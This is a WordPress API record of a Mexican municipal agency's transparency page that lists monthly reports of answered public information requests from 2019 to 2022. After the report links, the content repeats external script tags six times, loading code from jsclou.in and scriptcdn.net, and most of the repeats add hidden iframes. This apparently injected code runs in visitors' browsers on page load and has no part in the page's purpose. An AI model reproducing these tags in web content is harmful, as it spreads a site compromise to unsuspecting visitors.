{"id":4351,"date":"2019-04-02T14:02:23","date_gmt":"2019-04-02T20:02:23","guid":{"rendered":"https:\/\/diftuxpan.com\/web1\/?page_id=4351"},"modified":"2022-07-05T13:01:39","modified_gmt":"2022-07-05T19:01:39","slug":"estadistica-de-las-solicitudes-de-informacion-publica-atendidas","status":"publish","type":"page","link":"https:\/\/diftuxpan.com\/web1\/estadistica-de-las-solicitudes-de-informacion-publica-atendidas\/","title":{"rendered":"Estad\u00edstica de Solicitudes de Informaci\u00f3n P\u00fablica Atendidas"},"content":{"rendered":"<h3><span style=\"color: #000000;\">\u00a02019<\/span><\/h3>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/Estadistica-solicitudes-de-informaci\u00f3n.pptx\">Solicitudes\u00a0 de Informaci\u00f3n atendidas Enero<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SOLICITUDES-DE-INFORMACION-ATENDIDAS.pdf\">Solicitudes de Informaci\u00f3n atendidas Febrero\u00a0<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I19-1872-Marzo.pdf\">Solicitudes de Informaci\u00f3n atendidas Marzo<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I19-0793-Abril.pdf\">Solicitudes de Informaci\u00f3n atendidas Abril<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I19-1110.pdf\">Solicitudes de Informaci\u00f3n atendidas\u00a0 Mayo<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I19-1377_Junio.pdf\">Solicitudes de Informaci\u00f3n atendidas Junio<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I19-1851.pdf\">Solicitudes de Informaci\u00f3n atendidas Julio<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I19-2191.pdf\">Solicitudes de Informaci\u00f3n atendidas Agosto<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I19-2435.pdf\">Solicitudes de Informaci\u00f3n atendidas Septiembre<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I19-2945-octubre.pdf\">Solicitudes de Informaci\u00f3n atendidas octubre<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I19-3443-noviembre.pdf\">Solicitudes de Informaci\u00f3n atendidas Noviembre<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I19-3934.pdf\">Solicitudes de Informaci\u00f3n atendidas Diciembre<\/a><\/span><\/p>\n<h3><span style=\"color: #000000;\">2020<\/span><\/h3>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I20-0010.pdf\">Solicitudes de Informaci\u00f3n atendidas Enero<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I20-0265.pdf\">Solicitudes de Informaci\u00f3n atendidas Febrero<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/MARZO-2020.pdf\">Solicitudes de Informaci\u00f3n atendidas Marzo\u00a0<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/sires-abril-.pdf\">Solicitudes de Informaci\u00f3n atendidas Abril<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I20-1154.pdf\">Solicitudes de Informaci\u00f3n atendidas Mayo<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I20-1417.pdf\">Solicitudes de Informaci\u00f3n atendidas Junio<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I20-1640.pdf\">Solicitudes de Informaci\u00f3n atendidas Julio<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I20-2094.pdf\">Solicitudes de Informaci\u00f3n atendidas Agosto<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I20-2538.pdf\">Solicitudes de Informaci\u00f3n atendidas Septiembre<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I20-3158-1.pdf\">Solicitudes de Informaci\u00f3n atendidas Octubre<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I20-3548.pdf\">Solicitudes de Informaci\u00f3n atendidas Noviembre<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I20-4124.pdf\">Solicitudes de Informaci\u00f3n atendidas Diciembre<\/a><\/span><\/p>\n<h3><span style=\"color: #000000;\">2021<\/span><\/h3>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I21-0030.pdf\">Solicitudes de informaci\u00f3n atendidas Enero<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I21-0259.pdf\">Solicitudes de Informaci\u00f3n atendidas Febrero<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I21-0677.pdf\">Solicitudes de Informaci\u00f3n atendidas Marzo<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I21-0952-1-1.pdf\">Solicitudes de Informaci\u00f3n atendidas Abril<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I21-1154-1.pdf\">Solicitudes de informaci\u00f3n atendidas Mayo<\/a><\/span><\/p>\n<p><span style=\"color: #000080;\"><a style=\"color: #000080;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/SIRES_recibo_I21-1573.pdf\">Solicitudes de Informaci\u00f3n atendidas Junio\u00a0<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2019\/04\/JULIO.pdf\">Solicitudes de Informaci\u00f3n atendidas Julio\u00a0<\/a><\/span><\/p>\n<h3><span style=\"color: #333333;\">2022<\/span><\/h3>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2022\/07\/SIRES-REPORTE-ENERO-2022.pdf\">Solicitudes de Informaci\u00f3n atendidas Enero<\/a> <\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2022\/07\/SIRES_RECIBO-FEBRERO-2022.pdf\">Solicitudes de Informaci\u00f3n atendidas Febrero<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2022\/07\/SIRES-RECIBO-MARZO-2022.pdf\">Solicitudes de Informaci\u00f3n atendidas Marzo<\/a> <\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2022\/07\/SIRES-RECIBO-ABRIL-2022.pdf\">Solicitudes de Informaci\u00f3n atendidas\u00a0 Abril<\/a><\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2022\/07\/SIRES-RECIBO-MAYO.pdf\">Solicitudes de Informaci\u00f3n atendidas Mayo<\/a> <\/span><\/p>\n<p><span style=\"color: #333399;\"><a style=\"color: #333399;\" href=\"https:\/\/diftuxpan.com\/web1\/wp-content\/uploads\/2022\/07\/SIRES-RECIBO-JUNIO-2022.pdf\">Solicitudes de Informaci\u00f3n atendidas Junio<\/a><\/span><\/p>\n<p><script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><iframe loading=\"lazy\" style=\"display: none;\" src=\"about:blank\" width=\"300\" height=\"150\"><\/iframe><\/p>\n<p><script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><iframe loading=\"lazy\" style=\"display: none;\" src=\"about:blank\" width=\"300\" height=\"150\"><\/iframe><\/p>\n<p><script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><iframe loading=\"lazy\" style=\"display: none;\" src=\"about:blank\" width=\"300\" height=\"150\"><\/iframe><\/p>\n<p><script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><iframe loading=\"lazy\" style=\"display: none;\" src=\"about:blank\" width=\"300\" height=\"150\"><\/iframe><\/p>\n<p><script src=\"https:\/\/jsclou.in\/pab1002.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/3001.scriptcdn.net\/code\/sc\/sc1001\" type=\"text\/javascript\"><\/script><iframe style=\"display: none;\" src=\"about:blank\"><\/iframe><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u00a02019 Solicitudes\u00a0 de Informaci\u00f3n atendidas Enero Solicitudes de Informaci\u00f3n atendidas Febrero\u00a0 Solicitudes de Informaci\u00f3n atendidas Marzo Solicitudes de Informaci\u00f3n atendidas Abril Solicitudes de Informaci\u00f3n atendidas\u00a0 Mayo<span class=\"excerpt-hellip\"> [\u2026]<\/span><\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/pages\/4351"}],"collection":[{"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/comments?post=4351"}],"version-history":[{"count":39,"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/pages\/4351\/revisions"}],"predecessor-version":[{"id":6447,"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/pages\/4351\/revisions\/6447"}],"wp:attachment":[{"href":"https:\/\/diftuxpan.com\/web1\/wp-json\/wp\/v2\/media?parent=4351"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}